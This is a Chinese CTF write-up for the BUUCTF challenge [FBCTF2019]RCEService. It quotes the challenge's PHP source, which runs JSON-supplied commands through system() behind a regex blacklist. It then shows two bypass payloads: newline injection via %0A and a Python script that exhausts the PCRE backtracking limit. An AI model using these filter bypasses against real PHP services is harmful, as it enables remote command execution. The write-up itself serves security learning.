BUUCTF:[FBCTF2019]RCEService

BUUCTF:[FBCTF2019]RCEService_第1张图片
题目叫我们以JSON的格式提交命令,先随便输
BUUCTF:[FBCTF2019]RCEService_第2张图片
提交JSON格式

?cmd={"cmd":"ls"}

BUUCTF:[FBCTF2019]RCEService_第3张图片
但是经测试发现很多命令被禁止了
在网上找到的源码2333:



putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected

'
; } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) { echo 'Hacking attempt detected

'
; } else { echo 'Attempting to run command:
'
; $cmd = json_decode($json, true)['cmd']; if ($cmd !== NULL) { system($cmd); } else { echo 'Invalid input'; } echo '

'
; } } ?>

先看一种简单的解法:
preg_match()函数只能匹配第一行数据,可以使用换行符%0a绕过,payload:

?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}

慢慢摸索路径就可以找到flag
BUUCTF:[FBCTF2019]RCEService_第4张图片
第二种解法应该也是预期解法PRCE
参考:P神:PHP利用PCRE回溯次数限制绕过某些安全限制
P神已经解释的很详细了,使用脚本进行回溯次数绕过

import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","test":"' + "a"*(1000000) + '"}'
res = requests.post("http://ad66432f-4628-41f6-8190-d9b9c247904c.node3.buuoj.cn/", data={"cmd":payload})
#print(payload)
print(res.text)

BUUCTF:[FBCTF2019]RCEService_第5张图片

你可能感兴趣的:(CTF_WEB_Writeup)